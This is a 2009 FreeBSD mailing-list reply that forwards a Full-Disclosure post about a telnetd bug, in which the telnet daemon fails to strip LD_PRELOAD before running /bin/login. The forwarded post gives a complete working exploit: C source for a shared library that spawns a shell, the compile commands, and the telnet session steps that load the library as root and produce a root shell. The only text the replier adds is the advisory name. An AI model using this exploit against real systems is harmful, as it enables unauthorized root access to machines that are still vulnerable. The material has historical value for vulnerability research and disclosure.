Re: Fw: [Full-disclosure] FreeBSD zeroday

FreeBSD-SA-09:05.telnetd

On Wed, Feb 18, 2009 at 05:10:21PM +0000, Daniel C. Dowse wrote:
>
>
> Begin forwarded message:
>
> Date: Sat, 14 Feb 2009 03:46:07 +0100
> From: Kingcope Kingcope <kcope2(at)googlemail.com>
> To: full-disclosure(at)lists.grok.org.uk
> Subject: [Full-disclosure] FreeBSD zeroday
>
>
> FreeBSD (7.0-RELEASE) telnet daemon local privilege escalation -
> And possible remote root code excution.
>
> There is a rather big bug in the current FreeBSD telnetd daemon.
> The environment is not properly sanitized when execution /bin/login,
> what leads to a (possible) remote root hole.
>
> The telnet protocol allows to pass environment variables inside the
> telnet traffic and assign them to the other side of the tcp connection.
> The telnet daemon of FreeBSD does not check for LD_* (like LD_PRELOAD)
> environment variables prior to executing /bin/login.
> So passing an environment variable with the identifier LD_PRELOAD and
> the value of a precompiled library that is on the filesystem of the
> victims box that includes malicious code is possible.
> When /bin/login is executed with the user id and group id 0 ('root') it preloads
> the library that was set by remote connection through a telnet environment
> definition and executes it.
> It is unlikely that this bug can be exploited remotely but is not impossible.
> An attacker could f.e. upload a malicious library using ftp (including anonymous
> ftp users), nfs, smb or any other (file) transfer protocol.
> One scenario to exploit the bug remotely would be a ftp server running beside
> the telnet daemon serving also anoynmous users with write access. Then the
> attacker would upload the malicious library and defines the LD_PRELOAD
> variable to something similar to /var/ftp/mallib.so to gain remote root access.
>
> Here comes the actual exploit which can be executed with standard UNIX tools.
> Paste this into a file using your favorite text editor:
> ---snip-----
> # FreeBSD telnetd local/remote privilege escalation/code execution
> # remote root only when accessible ftp or similar available
> # tested on FreeBSD 7.0-RELEASE
> # by Kingcope/2009
>
> #include <unistd.h>
> #include <stdio.h>
> #include <sys/types.h>
> #include <stdlib.h>
>
> void _init() {
> FILE *f;
> setenv("LD_PRELOAD", "", 1);
> system("echo ALEX-ALEX;/bin/sh");
> }
> ---snip-----
>
> Then we compile this stuff.
>
> ---snip-----
> #gcc -o program.o -c program.c -fPIC
> #gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o
> -nostartfiles
> ---snip-----
>
> Then we copy the file to a known location (local root exploit)
>
> ---snip-----
> #cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
> ---snip-----
>
> ...or we upload the library through any other available attack vector.
> After that we telnet to the remote or local FreeBSD telnet daemon
> with setting the LD_PRELOAD environment variable to the known location
> as a telnet option before.
>
> ---snip-----
> #telnet
> >auth disable SRA
> >environ define LD_PRELOAD /tmp/libno_ex.so.1.0
> >open target
> ---snip-----
> ALEX-ALEX
> #ROOTSHELL
>
> This will give us an immediate (probably remote) root shell.
> This exploit is only verified on a FreeBSD 7.0-RELEASE fresh install
> with telnetd enabled. Other version of FreeBSD may also be affected,
> OpenBSD and NetBSD where not tested but MAY contain the same bug because
> of historic reasons.
>
> Signed,
> Kingcope[nikolaos rangos]/2009
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
> --
> Ich bin Online also bin Ich
>
>
> To Unsubscribe: send mail to majordomo(at)de.FreeBSD.org
> with "unsubscribe de-bsd-questions" in the body of the message

-- 
B.Walter <bernd@bwct.de> http://www.bwct.de
Modbus/TCP Ethernet I/O Baugruppen, ARM basierte FreeBSD Rechner uvm.
To Unsubscribe: send mail to majordomo(at)de.FreeBSD.org
with "unsubscribe de-bsd-questions" in the body of the message